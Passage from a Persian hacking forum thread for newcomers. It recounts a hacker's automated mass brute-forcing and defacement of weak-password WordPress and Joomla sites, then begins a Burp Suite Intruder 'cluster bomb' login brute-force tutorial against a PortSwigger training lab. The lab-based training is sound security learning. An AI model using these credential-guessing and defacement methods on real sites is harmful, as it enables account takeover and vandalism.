                              برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: change-default-wordpress-admin-log-in.png
مشاهده: 257
حجم: 27.3 کیلو بایت

                              بستر اصلی این حملات بروت فورس پسورد ضعیف بود و حتی این هکر موفق شد یکی از ساب دامین های microsoft را نیز با پسورد اتک مورد نفوذ قرار دهید و جالب است بدانید روزانه 600 الی 1000 وبسایت بطور اتوماتیک توسط ابزار های این هکر دیفیس و در zone-h.org ثبت میشد .
                              نمونه ای از این ابزار ها را برای حملات به سیستم های مدیریت محتوا جوملا در تصویر پایین نمایش داده شده است .

                              برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: ac376-cats.jpg
مشاهده: 230
حجم: 45.1 کیلو بایت
                              یوزر و پسورد لیست به برنامه داده میشد و کافی بود لیست سایت هایی که قرار است بررسی شود را به برنامه داد و بر روی یک سرور VPS اجرا کرد در هر بار حمله نفوذگر سایتهای روی سرور 20 الی 30 سرور اشتراکی را به برنامه میداد که چیزی حدود به 7000 تا 8000 وبسایت را مورد حمله قرار میداد و فقط کافی بود بر روی سرور سایتهایی با پسورد ضعیف شناسایی میشد نرم افزار بصورت اوتوماتیک شل یا صفحه دیفیس را آپلود و سپس در zone ثبت میکرد .

                              با سیایت های امنیتی جدیدی که وردپرس و جوملا پیاده سازی کرد این ابزار ها ناکار آمد شد . اما هنوز هم پسورد ضعیف در مغز وبسمترها دلالت دارد . هدف من از توضیح این تاریخچه تنها اشاره به این موضوع بود که این حملات ضریب امنیتی بالایی را برای نفوذگر ها ایجاد میکند ساخت یک پسورد لیست کامل و شناسایی یوزر valid باعث حملات موفق میشود .

                              ابزار brup suite امکان بروت فورس را برای هر نوغ پلتفرمی برای شما فراهم میکند در پست بعدی با هم شروع به بررسی حملات بروت فورس با این ابزار میکنیم .
                              -----------------------------SAFE MASTER---------------------------
                              تاپیک هکر های تازه وارد

                              نظر


                              • #90
                                Brute-forcing a login mechanism using Burp Intruder | بروت فورس یک مکانیسم ورود با Burp Intruder

                                Burp Intruder از انواع مختلف حملات پشتیبانی می کند. اغلب، یک وبسایت با بیش از یک نوع آسیب پذیری قابل دسترسی است، اما انتخاب مورد مناسب حمله می تواند در انجام تست های امنیتی دستی از تلاش و زمان شما صرفه جویی کند.

                                در این آموزش، نحوه استفاده از حمله بمب خوشه ای (Cluster bomb attack) در Burp Suite را برای اعمال نام کاربری و رمز عبور به طور همزمان یاد خواهید گرفت.

                                حمله بمب خوشه ای یا Cluster bomb attack چیست؟
                                حمله بمب خوشه‌ای از مجموعه‌های محموله‌های متعدد استفاده می‌کند، با مجموعه بار (حجم پاکت های ارسالی و درخواست صفحات ) متفاوتی که به هر موقعیت تعریف‌شده اختصاص داده می‌شود. هنگامی که یک حمله نیاز به درج چندین مقدار ورودی مختلف در چندین مکان دارد، برای تست نفوذ ورود بهترین گزینه است .

                                هنگام استفاده از حمله بمب خوشه ای، تعداد درخواست های ایجاد شده به صورت تصاعدی با تعداد بارهای تعریف شده افزایش می یابد. این بدان معنی است که این نوع حمله عمدتاً برای تکرار از طریق مجموعه داده های نسبتاً کوچک استفاده می شود.

                                به عنوان مثال، در این آموزش، لیستی از 101 نام کاربری و 100 رمز عبور، یک حمله 10100 درخواستی ایجاد می کند (101 * 100 = 10100).

                                حملات بروت فورس برای ورود به سیستم با استفاده از حمله بمب خوشه ای یا Cluster bomb

                                در حالی که راه حل اصلی آزمایشگاه زیر استفاده از دو حمله تک تیرانداز (sniper) جداگانه را برای حل آزمایشگاه پیشنهاد می کند، در این مثال ما آن را با استفاده از یک حمله بمب خوشه ای حل خواهیم کرد. مجموعه‌های بارگیری چندگانه حمله بمب خوشه‌ای شما را قادر می‌سازد تا فیلدهای نام کاربری و رمز عبور را به طور همزمان آزمایش کنید.

                                حل آزمایشگاه با استفاده از حمله بمب خوشه ای نسبت به استفاده از دو حمله Sniper کارایی کمتری دارد، زیرا منجر به ارسال درخواست های بیشتری می شود. با این حال، بر خلاف روش Sniper، روش بمب خوشه ای به شما متکی نیست که بتوانید نام های کاربری معتبر را برشمارید.

                                همین جا یه ترمز میکنیم تا خیلی واضعتر به این اصطلاحات تک تیر انداز و بمب خوشه ای و.... برسیم :
                                این تعاریف مکانیسم های حمله از پیش تعیین شده burp suite است :

                                برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 1.jpg
مشاهده: 252
حجم: 58.1 کیلو بایت

                                مرحله 1: آزمایشگاه را باز کنید ، شروع بررسی یک تارگت با آزمایش

                                مرورگر Burp را باز کنید و از آن برای دسترسی به URL زیر استفاده کنید :

                                کد:
                                https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses
                                برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 2.jpg
مشاهده: 239
حجم: 52.9 کیلو بایت


                                در حال حاضر نیازی به دریافت هدر ها نداریم پس گزینه Intercept is on را بزنید تا off شود .

                                پس از باز کردن url بالا گزینه Access the lab را بزنید تا وارد نمونه آزمایشی حملات شویم که یک صفحه ورود است :



                                مرحله 2: درخواست ورود را دریافت کنید | Intercept a login request

                                Intercept is on را روشن میکنیم و تمامی درخواست ها را در برنامه brup دریافت میکنیم. در اینجا میتوانیم مستقیما هدر را دریافت و یا در لیست هدر های دریافتی دنبال آن بگردیم .

                                میخواهیم از صفحه ورود یک نمونه هدر برای حملات بگیریم ، یک مقدار یوزر و پسورد فرضی میدهیم :

                                برخی از داده‌های نمونه را در قسمت‌های نام کاربری و رمز عبور وارد کنید تا به شما کمک کند بعداً آنها را شناسایی کنید. روی دکمه ورود کلیک کنید.

                                برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: entering-data-into-login-form.png
مشاهده: 234
حجم: 28.4 کیلو بایت

                                در برنامه brup suite به زبانه proxy بروید و بر روی تب HTTP history کلیک کنید ، حالا میتوانیم HTTP requests هایی که توسط مرورگر brup دریافت شده را ببینیم حالا دنبال درخواس لاگینی که انجام دادیم میگردیم .
                                دنبال درخواستی با متود POST و URL یا آدرس /login میگردیم و بر روی آن کلیک میکنیم .

                                برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: intercepting-a-login-request-with-burp-suite.png
مشاهده: 236
حجم: 382.2 کیلو بایت
                                مرحله 3: درخواست رهگیری شده خود را به Intruder ارسال کنید

                                برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 4.png
مشاهده: 235
حجم: 523.1 کیلو بایت

                                بر روی درخواست login راست کلیک کنید و گزینه Send to Intruder را بزنید تا درخواست به محیط Intruder وارد شود .


                                -----------------------------SAFE MASTER---------------------------
                                تاپیک هکر های تازه وارد

                                نظر

                                صبر کنید ..
                                X